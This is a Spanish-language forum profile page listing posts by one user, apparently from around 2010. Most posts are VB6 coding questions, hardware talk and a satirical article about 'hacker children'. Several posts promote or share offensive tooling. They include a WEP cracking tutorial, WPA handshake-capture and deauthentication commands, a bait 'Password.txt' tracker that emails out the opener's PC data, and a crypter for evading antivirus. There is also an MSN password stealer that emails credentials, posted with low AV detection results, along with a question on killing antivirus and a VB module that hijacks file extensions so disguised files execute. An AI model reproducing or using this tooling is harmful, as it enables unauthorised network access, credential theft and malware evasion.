Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Elemental Code

#46
Choreale el Wi-Fi al Vecino!!!

ERA JODA CHICOS, No hay que robarle el wifi al vecino, es maaaaaaaaalo

En el videotutorial les muestro como hackear una clave WEP de Wi-Fi con BackTrack 4

Bajense el Backtrack4 desde aca:
http://www.backtrack-linux.org/downloads/

Lo instalan en su pc, Lo graban y lo usan como live CD, lo instalan en una maquina virual o lo usan de frisbee. me da igual

VIDEO TUTORIAL
(Muuuuucho humor   )

Miralo en HD para ver que ***** escribo en la pantalla:
http://www.youtube.com/watch?v=mfKAL8edkEI

Una ultima cosa que no dice el video.

Cuando arranquen backtrack 4 van a tener una pantalla negra que les va a perdir primero usuario y contraceña

Por defecto es

Usuario: root

Contraseña toor

y despues para que inicie la interfaz grafica escriben

StartX

y listo. siguen el video.

REPITO: ESTE TUTORIAL NUNCA DEBE SER USADO PARA FINES ILEGALES (si chicos, robarle el wifi al vecino es ilegal)
ESTO ES MERAMENTE EDUCATIVO!
Si tienen algun problema... se joden

Algun dia si en un viaje astral se me canta hago uno de como hackear WPA2

Creo que la mayoria de ustedes ya debe saber como viene la mano, pero lo hice y a algun nwbie le va a servir.
#47
Tal cual lo leen.
la PEOR manera de obtener la MAC Address  :-[

Pero segun tengo entendido esta anda si o si  :-\

y lo hice yo  ;D

Código (vb) [Seleccionar]
Option Explicit
Function GetMyMAC() As String
   Dim tmp As String
   Shell "cmd.exe /c getmac >> " & Environ ("TEMP")  & "\EstaEsMiMACAddressYNoSeToca.txt", vbHide
   Open Environ ("TEMP")  & "\EstaEsMiMACAddressYNoSeToca.txt" For Binary As #1
   tmp = Space(LOF(1))
   Get #1, , tmp
   Close #1
   GetMyMAC = tmp
   Kill Environ ("TEMP")  & "\EstaEsMiMACAddressYNoSeToca.txt"
End Function


SI, me gusta usar batch y que?

Editado para que raulito se ponga contento
#48
Holaaaaaa.  ;D

Ariadne's Thread

Encuentra tu Pendrive, MP3 o Ipod Robado!
Pequeño software de rastreo que al ser abierto envia muchos datos de la pc.
En caso de robos, al ejecutar el programa obtendras muuuuchos datos del "ladron" aumentando tus posibilidades de saber quien lo tiene.

===0===

Find your Stolen Pendrive, MP3 Player or Ipod!
This software will email you with the information of the "thief's" Computer, hoping you will find him (or her :P)

Sorry for my bad english :P!




ScreenShot






Modo de uso:
Paso 1: Crear el Rastreador
Paso 2: Copiarlo en tu pendrive, mp3, ipod, etc. (Recomendable crearlo con un nombre llamativo: "Contraceñas.txt" seria muuuuy copado :P!!!)
Paso 3: Que te roben :P!
Paso 4: El choro abre el archivo que llama la atencion
Paso 5: Te llegan los datos.
Paso 6: Le rompes la cabeza al que te lo robo :D!

How to use :P
Step1: Build the Tracker
step 2: Copy the tracker to your USB drive (if you use a name like Password.txt is better ;D )
step 3: wait for somebody to steal you :P
step 4: The one who stole you opens the tracker
step 5: You get aaaall the info.
Step 6: You beat the crap out of the one who stole you :D!




Downloads!

http://infrangelux.sytes.net/FileX/index.php?dir=&file=ProjectAriadnesThread.zip
LINK ARREGLADO!
#49
Ingeniería Inversa / Spreader Facebook.
20 Diciembre 2010, 23:49 PM
Hola.
Estaba en faisbuc como siempre al re pedo cuando me mandan esto:

"Foto  http://www.facebook.com/l.php?u=www.acoplasticos.org/crm"


entro en acroplasticos y me encuentro con un site igualito a Facebook pero con un boton que dice que para ver la foto necesito bajarla.
OBVIAMENTE baja un archivo EXE que NO abri.  :P

lo que me sorprendio es que funcionase por FB.

http://acoplasticos.org/crm/ es el sitio y me sorprendio que la home te direcciona a un supuesto sitio de nosequepolimero colombiano :S

Analizen si quieren sino ... no :P

EDITO: Lo meti en una sandbox:
http://camas.comodo.com/cgi-bin/submit?file=0c0be56c272d47e79daa8ae55bd39ed35589549a7b55176f5b764d359ae33edf

Se hace pasar por drives de nvidia
#50
HOLA :D

Estoy haciendo un downloader para probar la funcion de kInvoke de Karcrack y le queria agregar un minimelt.
Que no eliminaria el programa que estas ejecutando sino el que bajaste y ejecutaste.

Osea el downloader lo que hace es bajar un archivo, ejecutarlo y necesito que cuando termine lo elimine.

pero si lo quiero eliminar antes del final de la ejecucion explota todo.

asi que, como hago lo que en consola seria.

Start notepad.exe /wait

??????
#51
Hola :D
Al pedo se me ocurrio ver como seria la forma mas sencilla de hacer que un form reaccionase al konami code
(Mas info del Konami Code aca: http://es.wikipedia.org/wiki/C%C3%B3digo_Konami)


La onda seria que cuando la persona aprieta el codigo (↑ ↑ ↓ ↓ ← → ← → B A) abra un msgbox o cualquiercosa.

Lo lindo es que tiene que ser en ese orden, que sea detectado por las pulsaciones del teclado (Pueden usar hooks, GetAsyncState o Form_Press) y que si te tardas la vida en poner el comando que sigue no funcione.

Si no entendieron... se joden (naaa mentira, pregunten)

Saludos y suerte a todos.


#52
VALIUM 1.0

Que hace?
Decile la hora y el soft te manda a dormir la pc.

Foto


Descarga

http://www.mediafire.com/?uym5t261qjt0uye

PD: Le hubiese puesto "El topo yiyo" pero solamente los argentinos hubieran entendido. >.<
#53
Programación Visual Basic / Administrar el Tiempo
1 Diciembre 2010, 16:24 PM
Hola :D
Anoche, tuve que dejar la pc prendida porque algo estaba andando y me di cuenta que no tengo manera facil de que se autoapague.

Entonces dije, zas armo un soft para que uno ingrese el tiempo y despues kaput.

Pero los timer de VB6.0 van en milisegundos.

Osea si yo necesito una hora serian cerca de 3600 * 1000 = 3600000 Milisegundos.

Existe una mejor opcion?, Esto consume muchos recursos y pone en riesgo el sistema?

Muchas gracias.
#54
como corno le hago para hacer el codigo onda matrix que cae.

que sean unos y ceros cayendo en columnitas.
no creo que sea muuuy dificil pero no se me ocurre como hacerlo.


Gracias por todo :D
#55
Esto debe estar ya aca, pero lo pongo por si alguien no lo vio.

Antes de que me tiren con de todo, NO comparto esta opinion.
Es solamente humoristico.

CitarComo padres en el mundo de las nuevas tecnologías, debemos estar alerta frente a los peligros que Internet puede suponer para nuestros hijos. Algunos como los Pedofilos o las Webs de contenido violento o pornográfico , ya son tenidas en cuenta por la mayoría de padres con hijos que navegan por Internet. Sin embargo otro tipo de amenazas como el Hacking, una forma moderna y devastadora de vandalismo electrónico, permanecen ocultas para la mayoría de los padres.

Su hijo, arrastrado por la imagen de "romanticismo" o "rebeldía" que inspiran los Hackers, pueden acabar convirtiéndose en uno de ellos. Lejos de esas imágenes virtuales, el Hacking es una actividad criminal que incluye la violación de la intimidad de terceros y provoca cuantiosos daños económicos a las grandes empresas.

En EEUU, España y en todos los países desarrollados del mundo, el hacking se ha convertido en una prioridad para las fuerzas policiales y se han creado nuevas leyes con duras penas, que en la mayoría de los casos equiparan estos delitos a los asociados con el terrorismo.

Para facilitar a los padres la tarea de determinar si su hijo puede haber caído en el lado mas oscuro de Internet, se ha elaborado un decálogo con los principales signos externos del hacking. Si la respuestas a tres o mas de estas preguntas es afirmativa, su hijo se encuentra en alto riesgo de convertirse en un Hacker. Si fueran mas de seis, no habría ninguna duda de que su hijo se ha caído en las redes del tenebroso submundo de Internet

No se deje engañar por la edad de su hijo, en EEUU decenas de hackers de 11 a 18 años son detenidos y encarcelados todos los años. En Europa un chico de 15 años, fue detenido y se enfrenta a una dura condena a varios años de cárcel por crear sofisticados programas pirata para reventar complejos códigos y así poder copiar ilegalmente los discos DVD.

Tampoco debe llevarse a la tranquilidad por tener una niña, cada día aumenta en numero de chicas que cometen este tipo de delitos.

¿Es mi hijo un Hacker?

1.- ¿Le ha pedido su hijo cambiar de proveedor de Internet?

La mayoría de familias españolas usa proveedores de acceso a Internet (ISP) de confianza, como Terra. Este tipo de proveedores tienen políticas de seguridad estrictas contra los hackers, y toman las medidas necesarias para que su navegación por Internet sea una experiencia segura, educativa y sobre todo legal. Si su hijo se esta convirtiendo en un Hacker, uno se sus primeros pasos será pedir el cambio a otro proveedor mas permisivo con las actividades ilegales de sus usuarios, etc.

Especialmente peligrosas son las conexiones de CABLE , etc., este tipo de conexiones quizás tengan un precio inferior, pero ofrecen una calidad menor y una alta latencia de conexión, así mismo para ahorrar dinero, estos proveedores no instalan cortafuegos (firewalls) ni splitters (separadores) entre sus clientes, por lo que el riesgo de ser infectado por gusanos informaticos o la posibilidad de introducirse en otros ordenadores con este tipo de conexiones es mucho mayor

Es muy importante que los padres se nieguen a estas peticiones. Una de las razones por las que su hijo esta interesado en cambiar de proveedor es poder evitar los filtros establecidos por los proveedores respetables para evitar el acceso a material ilegal, drogas , pornográfico, manuales de Hacking, etc.

2.- ¿Encuentra programas en su ordenador que usted no ha instalado?

Cualquier Hacker necesita disponer de herramientas software para llevar a cabo sus pérfidas acciones, si su hijo es un Hacker instalara aplicaciones Hacker. Muy posiblemente intentara esconder su presencia de alguna manera, pero usted podrá fácilmente controlar el software que hay en su computadora a través de "Agregar y quitar programas" en el papel de control de su sistema Windows.

Programas hackers extremadamente populares son "Bonzi Buddy" "Gator" "Mirc" "Seti@Home"

3.- ¿Le ha pedido su hijo comprar nuevo hardware?

Los Hackers necesitan computadoras extremadamente potentes para realizar sus actividades. Si su hijo esta utilizando software Hacker posiblemente le pida comprar una "tarjeta aceleradora" o discos duros mas grades.

Recuerde que quizás su hijo pueda tener motivos inocuos para estas peticiones, por ello si adquiere nuevo hardware hágalo siempre en el proveedor oficial de la marca de su ordenador.

Si su hijo le pide un nuevo procesador de la marca AMD, es un motivo de claro de alarma. AMD es una compañía asiática de semiconductores que fabrica copias pirata de los procesadores Intel Pentium. Usan mano de obra infantil en países del tercer mundo y anuncia sus productos con publicidad engañosa, como publicitar su CPU a 2000 mhz con nombres como "XP 2600+ mhz", sus procesadores son de baja calidad y con tendencia a fundirse. Sin embargo debido a que no incorporan las medidas de seguridad de los procesadores Intel Pentium son extremadamente populares entre los hackers.

Si encuentra que su hijo a adquirido por su cuenta algún elemento de hardware sofisticado, probablemente se esta dedicando al robo y fraude con tarjetas de crédito.

En cualquier caso nunca permita que su hijo adquiera hardware el mismo o manipule su ordenador. Adquiera siempre productos de marcas reconocidas , Intel, IBM , Dell o Compaq. Lleve siempre su ordenador al servicio técnico oficial a la hora de ampliar su sistema.

4.- ¿Tiene su hijo Manuales Hacker?

Actualmente la información para realizar todo tipo de actividades ilegales con computadoras se puede encontrar fácilmente en Internet, en formato electrónico. Sin embargo existe la posibilidad de que su hijo tenga libros relacionados con el hacking.

Cualquier libro con la palabra "hack" en su titulo será un indicio inequívoco. Otros indicios claros son "Perl" (un poderoso código usado para la ocultación y extracción de datos) o "Macromedia".

Así mismo libros de los famosos hackers Neal Stephenson, Willian Gibson o Emanuel Goldstein son una influencia perniciosa ya que sus relatos de ficción de hacking están acompañados de fuertes dosis de sexo o uso de drogas.

5. ¿Pasa su hijo mucho tiempo frente al ordenador sin hacer nada aparentemente?

Una de las actividades preferidas de los hackers, es la realización de ataques DOS, estos ataques se realizan mediante el uso de la línea de comandos del sistema (command prompt ) y permiten deshabilitar ordenadores conectados a redes informáticas y telefónicas, incluso los sistema de centrales nucleares, 091, etc.

Este tipo de actividades requiere de varias horas para su realización, si encuentra que su hijo pasa largas horas con el ordenador, pero en lugar de navegar o jugar a algún videogame, su pantalla solo se observan líneas de texto sobre un fondo negro, sin ningún tipo de gráficos o imágenes, como el que muestra un ordenador antes de arrancar windows, muy posiblemente este realizando un ataque DOS.

6. ¿Juega su hijo al "CounterStrike"?

Bajo la apariencia de un juego de ordenador, el programa "CounterStrike" esconde un mundo de realidad virtual, donde los hackers se reúnen para formar clanes (grupos hackers), así mismo este juego fomenta la apología del terrorismo y la violencia, proporciona información real para actos terroristas, como detallados manuales del uso de la metralleta kalasnikov o de bombas de mano (tipo flash-bang) caseras.

Si encuentra a su hijo jugando al "counter" (como suelen abreviar los hackers) , dialogue con el, y hágale entender que este tipo de programas no están permitidos en su casa.

Otras variantes del "CounterStrike" (los llamados en la jerga hacker MODS) son los programas "Doom", "Ku-EIC" y el "Simms".

6. ¿Ha descubierto de su hijo consume drogas?

Es habitual la relación del mundo del Hacker, con las drogas ilegales , particularmente los hackers tienden a consumir drogas que les ayuden a pasar horas y horas despiertos delante del ordenador, como anfetaminas, speed, extasis, *****, etc.

Si su hijo usa habitualmente una computadora y consume drogas, quizás esto solo sea un síntoma de que ha entrado en el submundo de los hackers.

7. ¿Tiene instalado Linux en su ordenador?

BSD, Linux, Fedora son algunos de los nombres de versiones de un sistema operativo pirata ilegal diseñado por el famoso Hacker sueco Axel Tolvards. Se trata de una copia del programa "UNIX" un potente software escrito por Microsoft para el gobierno norteamericano en los años 80.

Los hackers usan Linux para introducirse en los ordenadores de otras personas, robar tarjetas de credito o traficar con pornografía. El propio Tolvards es conocido por escribir múltiples programas hackers incluidos en Linux, como "Telnet" que permite hacerse con el control remoto de un ordenador, o "Traceroute" que permite localizar los ordenadores de sus victimas en Internet.

Su hijo probablemente esconda que ha instalado Linux en su ordenador. Lo cual seria extremadamente peligroso pues al tratarse de un sistema altamente inestable podría destruir toda la información que tenga almacenada en el mismo.

Si usted ve las palabras "LILO" o "GRUB" durante el arranque de su ordenador justamente antes del inicio de Windows, esto quiere decir que Linux esta instalado y a tomado el control del sector maestro de arranque.

Si descubre Linux instalado en su ordenador, lo mejor que puede hacer es desinstalarlo lo antes posible.

8. ¿Es el teléfono móvil de su hijo del tipo GPRS, UMTS, o Bluetooth.?

Los hackers necesitan para realizar parte de sus actividades, conocidas como "prehacking", teléfonos móviles de alta potencia, con protocolos de gran velocidad tipo GPRS, UMTS o Bluetooth. Este tipo de características solo tienen un uso legal para los atareados ejecutivos que realizan habitualmente viajes de negocios. Si su hijo dispone de un teléfono móvil con estas características muy posiblemente lo este usando para "prehackear".

El "prehacking" es una actividad altamente delictiva que incluye el desbloqueo de las funciones de seguridad de los móviles, las tarjetas SIM pirateadas, etc. Este tipo de negocios ilegales son junto con la prostitución una de las mayores fuentes de ingresos de las mafias de inmigrantes ilegales. Basta con recordar que Jamal Zougam el cerebro de los ataques terroristas del 11-M regentaba un locutorio telefónico en Lavapies donde su principal negocio era la reventa de tarjetas telefónicas pirata.

9. ¿Visita su hijo paginas web sospechosas?

Utilice el historial del navegador (pulsando simultáneamente Control y H) para descubrir si su hijo visita portales y paginas webs hackers como "barrapunto.com", "sindominio.com" ,"slashdot.org" "linux-es.org", "yonkis.com".

Como habrá podido observar en las cloacas de Internet el hacking y el resto de actividad ilícitas son inseparables, así que seria una buena idea comprobar, una por una, todas las paginas que visita su hijo para asegurarse de en el historial no existen otras paginas de contenidos peligrosos: fabricación casera de armas y explosivos, pornografía, terrorismo, etc.

10. ¿Le ha pedido su hijo permiso para asistir a una "Party" o una "Con"?

Los Hackers realizan reuniones (Con) o fiestas (Partys) , este tipo de eventos serian el equivalente de las fiestas Rave de los adictos a las drogas sintéticas. Aunque ellos las definen como inocuas "reuniones de fanáticos de la informática" en realidad se trata de congregaciones de todo tipo de elementos del vertedero de Internet. Las principales actividades son participar en juegos violentos, el trafico de programas pirata, pornografía de todo tipo, programas hackers, tarjetas de crédito, consumo de drogas, etc.

Algunas de ellas, las denominadas HackLab, son celebradas en casas y edificios ocupados ilegalmente, e incluso se sospecha que algunas son organizadas por elementos cercanos a los grupúsculos juveniles de la izquierda nacionalista vasca (ETA).

Aunque en España las que reciben mayor afluencia de publico son la Campus Party, Euskal Party, etc.

No permita que su hijo asista solo a ningún tipo de "reunión informática" o bien acompáñele a la misma.

¿Que hacer si hijo es un Hacker?

Avise de la situación a sus educadores (tutor, profesores, director de instituto, etc.). Quizás su hijo a sido captado por un grupo Hacker o incluso puede haber creado uno, que opera en su entorno educativo. Si es el caso, piense en un cambio de colegio/instituto/universidad, para alejarlo de las malas influencias, lo mas apropiado seria un centro privado , por ejemplo religioso, donde proporcionen la formación moral adecuada.

Restringa totalmente el uso del ordenador por parte de su hijo hasta que no arregle la situación. Si usted usa el ordenador, colóquelo en una estancia de la casa , como la sala de estar, donde pueda controlarlo en todo momento, si no puede hacerlo desásgase temporalmente del ordenador .

Sea comprensivo pero firme, a fin de no agravar la situación, ya que dar rienda suelta a su enfado solo entorpecería la recuperación de su hijo. Seguro que desea verlo convertido en un adulto responsable y capaz de pensar por sí mismo. Por ello, dedique el tiempo necesario a hablar francamente con él para hacerle ver los beneficios de mantenerse apartado del Hacking y del resto de peligros de Internet.

Si no obtiene mejoras, consulte con un profesional.

Fuente: http://hk9888.wordpress.com/2008/10/16/como-saber-si-hay-un-hacker-en-la-familia-locura-total-wtf/
#56
Hola
Quiero armar un programa que pegue un texto X en alguna pagina como Pastebin.com o tinypaste.com
Las dos tienen apis.
http://tinypaste.com/api/doc/create
http://pastebin.com/api.php

Pero no entiendo ni cuarto de PHP asi que toy bastante frito.

Lo unico que tengo es el codigo de karckrak para postear en twitter y tampoco lo entiendo >.<


aca les dejo la funcion que armo karckrak para el tweetwlm
Código (vb) [Seleccionar]

Public Sub TweetIt(ByVal sStr As String)
    Const sURL      As String = "http://api.twitter.com/1/statuses/update.xml?status="
    Dim oWinHTTP    As Object 'As New WinHttp.WinHttpRequest

    Set oWinHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")

    With oWinHTTP
        Call .Open("POST", sURL & sStr)
        Call .SetCredentials(App.ProductName, App.Comments, 0)
        Call .Send
    End With
   
    Set oWinHTTP = Nothing
End Sub


Gracias por la ayuda
#57
Hardware / pregunta sobre los voltajes del cpu
20 Octubre 2010, 17:42 PM
hola
estuve leyendo por ahi que para mantener mas estable el procesador cuando overclockeo tengo que subir el voltaje.

eso esta bien
pero tambien lei que si no tengo cuidado puedo quemar la placa de video que tengo puesta porque el voltaje aumenta todo parejo >.<

Me gustaria saber si eso va por modelo de placa, si es un software, desde bios o como hago para no quemar todo lo demas

Muchas Gracias

EDITO: me olvidaba, la compu es medio viejita y la placa de video es AGP
#58
Hardware / Cooler de Cajero Automatico.
20 Octubre 2010, 17:29 PM
esto es lo que tiene mi pc vieja porque se calentaba mucho.

Mira...



Chan!

Si, es de un cajero automatico y funciona a 220 V
Encontro mi viejo un dia un cajero todo hecho bolsa y vio que el fan parecia sano.
Lo saco y despues lo mutamos en eso.
quedo re bien y sopla una barbaridad el problema es el ruido que mete >.<
(lo negro que se ve es un filtro de aire para no meterle taaaaanta mugre)


Aprovecho para preguntar si puedo poner fotos de modding aca

Saludos :D
#59
Hola.
Estoy tratando de hacer algo que invierta los ejes del raton.
osea que si voy a la derecha la flechita valla a la izquierda y etc.

Tengo el codigo Choreado Prestado del NRC de Psyke con hook al mouse pero ni idea como hacer

puedo tomar la poscicion actual del cursor y hacerlo saltar a una.

osea, los comandos los tengo, me falta cabeza de programador.

Gracias por la ayuda.

Codigo del hook al mouse
Código (vb) [Seleccionar]
Option Explicit

Private Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib "user32.dll" (ByVal hHook As Long) As Long

Dim hHook As Long

Public Sub StartHook()
    hHook = SetWindowsHookEx(14, AddressOf MouseProc, App.hInstance, 0)
End Sub

Public Sub StopHook()
    Call UnhookWindowsHookEx(hHook)
End Sub

Private Function MouseProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long
    'On Error Resume Next
    If wParam = 516 Then 'si sirve de algo el wParam cuando se mueve el mouse es 512
      Form1.Print "CLICK BOTON DERECHO"
    ElseIf wParam = 517 Then Form1.Print "SOLTÓ BOTON DERECHO"
    ElseIf wParam = 513 Then Form1.Print "CLICK BOTON IZQUIERDO"
    ElseIf wParam = 514 Then Form1.Print "SOLTÓ BOTON IZQUIERDO"
    ElseIf wParam = 519 Then Form1.Print "CLICK BOTON MEDIO"
    ElseIf wParam = 520 Then Form1.Print "SOLTÓ BOTON MEDIO"
    End If
   
    Form1.Caption = wParam
End Function


Este es el codigo de pruebas que tengo en el form.
Código (vb) [Seleccionar]
Option Explicit
Private Declare Function GetCursorPos Lib "user32.dll" (ByRef lpPoint As POINTAPI) As Long
Private Declare Function SetCursorPos Lib "User32" (ByVal X As Long, ByVal Y As Long) As Long

'\\Variables
Private Type POINTAPI
    X As Long
    Y As Long
End Type

Dim pt As POINTAPI
Dim Que As Variant
Dim cX As Integer, cY As Integer
Private Sub Command1_Click()
   GetCursorPos pt
   cX = pt.X: cY = pt.Y
   Command1.Caption = cX & ";" & cY
End Sub

Private Sub Form_Load()
  Me.AutoRedraw = True
  StartHook
End Sub
Private Sub Form_Unload(Cancel As Integer)
  StopHook
End Sub


Cuando apretas el boton Command1 cambia su caption a las coordenadas del cursor
Para hacer "saltar" el cursor es
Código (vb) [Seleccionar]
SetCursorPos [X,Y]
#60
Hola
Este es un tutorial para que aprendan como corno hacer andar musica .XM en VB6.0

Despues de comerme el coco buscando encontre algo.
Aca lo plasmo.

Primero.
Que corno es musica Xm, musica de trackers o chiptunes?
CitarTracker es un tipo de software con la función de un secuenciador para música, que permite añadir muestreos digitales o samples  en listas de tiempos que se reparten en canales. Las entradas de los tonos, volumen, y efectos no se representan por símbolos, por ejemplo de notas, sino por caracteres alfanuméricos e incluso hexadecimales.

Ok esto en español significa la musiquita que sonaba en los jueguitos de family.

Cual es la ventaja de esta musica?
mientras que un mp3 de 5 min te puede pesar un par de megas aca podes poner 20 minutos de musica y pesa medio mega, ademas podes ponerlo en ciclo y escucharlo 500 veces y ni te das cuenta.

Donde encuentro musica asi?
Suele estar en los keygens pero como aca somos toodos legales  :¬¬  :¬¬  nunca vimos un keygen.
Podes bajarte las canciones de aca: http://www.keygenmusic.net/?lang=es

Ok. Empezemos.

Nos descargamos lo siguiente:
uFMOD --> http://ufmod.sourceforge.net/
Resource Hacker --> http://www.angusj.com/resourcehacker/
Una cancion .xm (Esta me gusto a mi, sino busquen mas en keygenmusic.net) http://www.keygenmusic.net/music/at4re/AT4RE-MultiPasswordRecovery1.0.5crk.rar

Descomprimimos uFMOD y vamos a ver multitud de cosas >.<
En la carpeta VisualBasic6.0 va a haber otra carpeta llamada Readme y adentro de esa otra mas llamada VB98
Copiamos el LINK.exe de esa carpeta (si la tienen clara en C pueden leer el codigo fuente que viene incluido)

Nos vamos a la carpeta adonde esta instalado visual basic 6.0 (en mi caso: C:\Program Files\Microsoft Visual Studio\VB98)
Buscamos el archivo LINK.exe original Y LE CAMBIAMOS EL NOMBRE A LNK.EXE (IMPORTANTISIMO ESTE PASO O CAGAN TODO VB!)
Una vez renombrado lnk.exe pegamos el nuevo LINK.exe

Creamos un nuevo proyecto en Visual basic.
Si no lo hicimos nunca en nuestra vida tenemos que agregar el componente de editor de recursos vb
Esto esta en Complementos -> Aministrador de complementos ( En ingles: Add-Ins > Add-In Manager.). Ahi buscamos "VB Resource Editor" y marcamos las casillas que dicen "Cargado/Descargado" y "Cargar al Iniciar"

ES NECESARIO REINICIAR VISUAL BASIC DESPUES DE ESTO!

Ahora creamos un nuevo archivo .res
(ni idea como se hace esto, yo cree un documento txt y le cambie la extensión a res >.<)

Lo abrimos con el Resource Hacker.
Vamos a Action-> Add a new resource y abrimos el tema xm que quisieramos.
En las opciones ponemos 10 en la primera y en la segunda lo que queramos (En este ejemplo voy a usar 101)
Guardamos y salimos.

Ahora vamos a la carpeta adonde tenemos el proyecto de visual basic y copiamos:
--> El archivo Res que acabamos de crear.
--> El Archivo .xm de la musica
Los siguientes archivos estan en el archivo rar uFMOD en la carpeta VisualBasic6/WINMM o Visualbasic6/DirectX Segun corresponda
--> Los archivos uF_vb.bas (para WINMM) o  DSuF_vb.bas (DirectX)
--> Los archivos ufmod.lib   (para  WINMM)  o   dsufmod.lib  (DirectX)

MUY IMPORTANTE QUE NO CAMBIEMOS NAAAAAADA DE ESTOS ARCHIVOS. NI SIQUIERA EL NOMBRE

Abrimos nuestro proyecto en visual basic y añadimos uF_vb.bas o DSuF_vb.bas (segun corresponda) y nuestro archivo RES.

Ahora los codigos:
Para que empieze a sonar es esto:
Código (vb) [Seleccionar]
uFMOD_PlaySong 101, 0, XM_RESOURCE
101 Es el nombre del recurso que dije mas arriba

y para que pare es asi:
Código (vb) [Seleccionar]
uFMOD_PlaySong 0, 0, 0

Ya le diste al f5??
JAJAJA
No funciona adentro del IDE de visual basic.
Compilalo a CODIGO NATIVO (EN P-CODE NO FUNCIONA)
ahora si probalo.

COSA MUUUY IMPORTANTE
Al compilar el proyecto en la carpeta del proyecto tienen que estar si o si el modulo del uFMOD, el archivo LIB del uFMOD, el chiptune EN .XM! y el archivo res para que compile correctamente.

Espero que les salga todo bien ^^


Fuente:
http://www.allquests.com/question/3364084/%5BTutorial%5D-Adding-Keygen-music-to-Visual-Basic-project.html
#61
Hola.
Necesito hacerle un hook al mouse para invertir los ejes Y ; X

Tengo idea de como hacer el codigo (mas o menos)
Pero no encuentro ningun tutorial donde me explique algo de ganchos o hooks.

Saben de algun lugar adonde pueda entrar en el tema?

Muchas gracias.
#62
Toxic Waste 0.5b

Sencillisimo Crypter RC4 Scantime que lo detecta hasta una calculadora porque el algoritmo es malisimo.
Pero para aprender esta barbaro.

La version 1.0 la voy a sacar cuando entienda como corno funciona el RunPE de karcrak.


el codigo es basicamente un algoritmo RC4 mezclado con strReverse y un modulo de ejecucion sin API hecho por nuestro querido BlackZero.





DESCARGA EXE + SOURCE VB6.0:
http://www.multiupload.com/GC02T599XW

Ya se que el codigo es malisimo y que lo unico bueno (si entendes ingles) es el chiste en el dialogo "Acerca de".
Pero a alguien muuuuuy nuevo le puede servir analizar el code.
#63
Análisis y Diseño de Malware / Como cerrar un av?
4 Septiembre 2010, 21:10 PM
Hola.
Desde que empeze a joder con batch siempre tuve la loca idea de armar SIDA para PC.
Pero aprendi que con terminate process no se puede y que si podes la maquina se tumba junto con el AV.

Existe algo de mas "bajo nivel" para arrancar el AV al raz?

Programo en VB pero de ultima diganme que es lo que hay.

Muchas Gracias  :-* ;)
#64
Tengo un problema con el backtrack 4

le doy al airodump para que guarde el paquete.

con otra hago el handshake ( aireplay-ng -0 0 etc etc)

todo muy lindo pero el airodump no me "registra" el handshake


osea no me sale el mensajito " WPA handshake:"

Saben que puedo estar haciendo mal?

el orden de los comandos lo pongo asi:

root@bt:~# airmon-ng
root@bt:~# airmon-ng start wlan0
root@bt:~# airodump-ng mon0
root@bt:~# airodump-ng mon0 --channel [canal] --bssid [atacado] -w /tmp/wpa2
root@bt:~# aireplay-ng -0 0 -a [atacado] -c [user conectado] mon0

Aca deberia aparecer el mensaje que se encntro handshake en la ventana del airodump pero no aparece.
sin embargo la entana del aireplay dice que todo esta bien.

alguien entiende que hice mal?
#65
Que hace?
Obtiene contraceñas y las manda por email

Para que sirve?
Mata, Mata, MATAA!
Si te olvidaste la contraceña y la tenes guardada en el msn con esto la recuperas.

Como hace?
Usa el modulo WLMPD de Cobein.

Foto:




Escaneo:
File Info

Report date: 2010-07-26 16:09:29 (GMT 1)
File name: ElementalStub.dll
File size: 49152 bytes
MD5 Hash: cd7d2e1805a1c57d747da1dee5428aaf
SHA1 Hash: 383b5f71c797c99942cef684a94a2c99fce7103d
Detection rate: 2 on 16 (13%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/Spy.Gen
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 - W32/VBTrojan.17G!Maximus
G-Data -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -


Ver Reporte


Descarga
Depositfiles:
http://depositfiles.com/files/7lxj5fqz3

Mirror Fileserve:
http://www.fileserve.com/file/KeGv9VW
#66
Que hace?
Modifica el Registro añadiendo una nueva extensión de archivo

Para que sirve?
Posta esto sirve?
Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutable
Sencillamente lo que hacemos es "convencer" al sistema que nuestro archivo "PokebolaVe.jpg" es un ejecutable y que debe ser ejecutado como tal.

Como hace?
Se modifican unos valores en el registro.
Estos son:
(suponiendo que nuestra extensión es .Troj

HKEY_CLASSES_ROOT\.troj\"trojfile"
HKEY_CLASSES_ROOT\trojfile\"Documento de texto"
HKEY_CLASSES_ROOT\trojfile\"NeverShowExt"=""
HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command\""%1" %*"


Codigo mInfectExt
Código (vb) [Seleccionar]

Option Explicit
' /-----------------------------------------------------------------------------------\
'|=====================================================================================|
'|=/---------------------------------------------------------------------------------\=|
'|=| Module      : mInfectExt                                                        |=|
'|=| DateTime    : 24/07/2010 05:14 PM                                               |=|
'|=| Author      : Elemental Code                                                    |=|
'|=| Mail        : Elemental_Code[at]hotmail[dot]com                                 |=|
'|=| WebPage     : I haven't got one Yet ^.^                                         |=|
'|=| Purpose     : EDUCATIONAL ONLY code that creates a new extensión in Windows Reg |=|
'|=| Requirements: UAC may Stop you, i dont know >.<                                 |=|
'|=| Distribution: You can freely use this code in your own                          |=|
'|=|               applications, but you may not reproduce                           |=|
'|=|               or publish this code on any web site,                             |=|
'|=|               online service, or distribute as source                           |=|
'|=|               on any media without express permission.                          |=|
'|=\---------------------------------------------------------------------------------/=|
'|=====================================================================================|
' \-----------------------------------------------------------------------------------/
Public Function InfectExt(Ext As String, Info As String, Ocult as Boolean)
   Dim WS As Object
   Dim FullExt As String
   Dim UniqVal As String
   UniqVal = Ext & "File"
   FullExt = "." & Ext

   Set WS = CreateObject("WScript.Shell")
   WS.RegWrite "HKCR\" & FullExt & "\", UniqVal
   WS.RegWrite "HKCR\" & UniqVal & "\", Info
    If Ocult = True Then
       WS.RegWrite "HKCR\" & UniqVal & "\NeverShowExt", ""
    EndIf
